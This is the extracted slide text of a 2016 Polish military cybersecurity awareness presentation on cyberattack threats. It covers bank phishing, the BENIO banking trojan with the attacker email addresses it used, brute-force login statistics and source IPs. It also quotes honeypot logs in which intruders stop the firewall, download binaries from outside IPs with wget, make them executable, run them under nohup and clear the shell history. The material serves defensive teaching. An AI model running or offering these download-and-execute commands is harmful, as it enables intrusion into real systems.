Cyberatak przykłady zagrożeń kmdr ppor. Adam STOJAŁOWSKI Sekcja Bezpieczeństwa Cyberprzestrzeni ZZWT w Gdyni Gdynia 08.12.2016r.

CYBERATAK – PRZYKŁADY ZAGROŻEŃ Celem prezentacji jest przedstawienie wybranych zagrożeń wpływających na bezpieczeństwo systemów teleinformatycznych powodowanych przez ataki pochodzące z cyberprzestrzeni. W dalszej części zostaną przedstawione przykłady zaobserwowanych cyberataków oraz potencjalne zagrożenia jakie mogą być następstwem zlekceważenia środków bezpieczeństwa.

CYBERATAK – PRZYKŁADY ZAGROŻEŃ Jak atakować Jak się bronić

Byłem przekonany, że ten mail wysłali do mnie z banku. CYBERATAK – PRZYKŁADY ZAGROŻEŃ „System jest tak bezpieczny jak bezpieczne jest jego najsłabsze ogniwo.” Byłem przekonany, że ten mail wysłali do mnie z banku. Przedtem też otrzymywałem korespondencję mailową. Skąd mogłem wiedzieć, że w tym załączniku jest wirus. Ten załącznik nazywał się „Zmiana regulaminu świadczenia usług bankowych”. Co mam teraz zrobić? Przelałem tyle pieniędzy a oni mówią, że to moja wina. Mówią, że moim obowiązkiem przed zatwierdzeniem transakcji było sprawdzenie numeru konta.

Trojan BENIO jako kolejna wersja VBKlip CYBERATAK – PRZYKŁADY ZAGROŻEŃ „Nazywam się BENIO i stałem się sławny 30.08.2016” Trojan BENIO jako kolejna wersja VBKlip Infekcja poprzez link w mailu - .pdf.src Trojan składa się z pięciu plików: Pliki wykonywalne (taskmgr.exe; mscvhost.exe; msavhost.exe) Plik konfiguracyjny (klucz rejestru „Windows 10 updater”) Plik PDF C:\!new supp\! PRACA !\drbenio\X1\Project1.vbp pl/hades/do/Login Logowanie XPl@net XCredit Agricole Internetowej - Getin XInternetowej - Getin internetowej ING Moje ING mBank serwis transakcyjny Xinternetowej Banku Pocztow iPKO - nowa bank XLogowanie - Raiffeisen Bank Pekao24 - banko XMILLENNIUM Zasada działania: Trojan przeszukuje pamięć procesu przeglądarki, aż znajdzie odpowiednie sekwencje znaków (np. „Numer konta:”, „Odbiorca”, „Wyślij”). Po znalezieniu tych sekwencji podmienia dane znajdujące się między nimi. Zapobieganie: Przed przepisaniem kodu potwierdzającego przelew sprawdzić numer rachunku podany w SMSie przez bank. 01 0720 0700 mail.vfemail.net 02 0380 0400 587 03 9999 9999 ghandimnkl@vfemail.net 04 9999 9999 [PASSWORD] 05 0800 0650 whoratbbcg@vfemail.net

Używane nazwy użytkownika CYBERATAK – PRZYKŁADY ZAGROŻEŃ Próby przełamania zabezpieczeń – metoda słownikowa Używane nazwy użytkownika Używane hasła Top 10

Około 92 % ruchu pochodzi z Chińskiej Republiki Ludowej CYBERATAK – PRZYKŁADY ZAGROŻEŃ Ilość połączeń z danego adresu IP Około 92 % ruchu pochodzi z Chińskiej Republiki Ludowej Top 10

Source IP – przedstawienie graficzne CYBERATAK – PRZYKŁADY ZAGROŻEŃ Source IP – przedstawienie graficzne żródło: Google Maps, Google Inc. IP Address Probes City Region Country Name Code Latitude Longitude Hostname 116.31.116.14 60008 Guangzhou Guangdong China CN 23.1167 113.25 116.31.116.40 8909 116.31.116.41 8750 212.83.133.5 5541   France FR 48.86 2.35 212-83-133-5.rev.poneytelecom.eu 116.31.116.50 4475 116.31.116.30 2421 116.31.116.6 1916 116.31.116.10 1754 123.31.34.92 1626 Hanoi Thanh Pho Ha Noi Vietnam VN 21.0333 105.85 localhost 221.229.172.114 1533 Nanjing Jiangsu Sheng 32.0617 118.7778

Próba instalacji złośliwego oprogramowania typu trojan MulDrop CYBERATAK – PRZYKŁADY ZAGROŻEŃ Zarejestrowane przykłady ataku Próba instalacji złośliwego oprogramowania typu trojan MulDrop server:~# service iptables stop server :~# wget -O /tmp/sb250 http://23.234.25.140:15828/sb250 http:///tmp/sb250: Unsupported scheme. server :~# chmod 777 /tmp/sb250 server :~# /tmp/sb250 bash: /tmp/sb250: command not found server :~#  *** End of log! *** Trojan.Muldrop is a Trojan that spreads via shared networks or attaches itself to downloadable files. Trojan.Muldrop is classified as a backdoor infection, because it can easily bypass your computer defense guard and exploit alternative paths when intruding on you. Trojan.Muldrop usually uses rootkit techniques so as to stay undetected by security programs installed on your computer. Trojan.Muldrop may pop up some fake system warnings and push you to buy scareware. The most annoying thing is that your personal files can get erased or modified by Trojan.Muldrop without your awareness. Taking the above characteristics of Trojan.Muldrop, you need to try your efforts to remove Trojan.Muldrop virus once its traces get spotted on your computer. Wykonane operacje: - próba wyłączenia lokalnego firewala - próba instalacji złośliwego kodu

Zarejestrowane przykłady ataku CYBERATAK – PRZYKŁADY ZAGROŻEŃ Zarejestrowane przykłady ataku Próba instalacji złośliwego oprogramowania typu trojan Linux/Setag.B.Gen serwer:~# service iptables stop bash: service: command not found serwer :~# chattr -i /usr/bin/wget bash: chattr: command not found serwer :~# chmod 0755 /usr/bin/wget serwer :~# chattr -i /usr/bin/nohup bash: chattr: command not found serwer :~# chmod 0755 /usr/bin/nohup serwer :~# chattr -i /etc/ bash: chattr: command not found serwer :~# cd / serwer :/# wget -O /tmp/vjudp http://183.61.171.149:5896/vjudp http:///tmp/vjudp: Unsupported scheme. serwer :/# chmod +x /tmp/vjudp serwer :/# nohup /tmp/vjudp > /dev/null 2>&1 & bash: nohup: command not found serwer :/# history -c *** End of log! *** Wykonane operacje: próba wyłączenia lokalnego firewala próba zmiany atrybutów tylko dla roota próba instalacji złośliwego kodu próba podtrzymania działania złośliwego kodu po wylogowaniu czyszczenie historii operacji Linux/Setag.B.Gen can perform a lot of spiteful activities in the background. It can bypass many antivirus programs and sneak into a target computer secretly. While running in the background, the Trojan horse will also corrupt your internet browsers to collect your browsing history and other sensitive personal data such as username, email address, phone number, passwords and so on. In addition, the Trojan will generate suspicious pop-ups and redirect you to some malicious sites, which will result in more malware infection.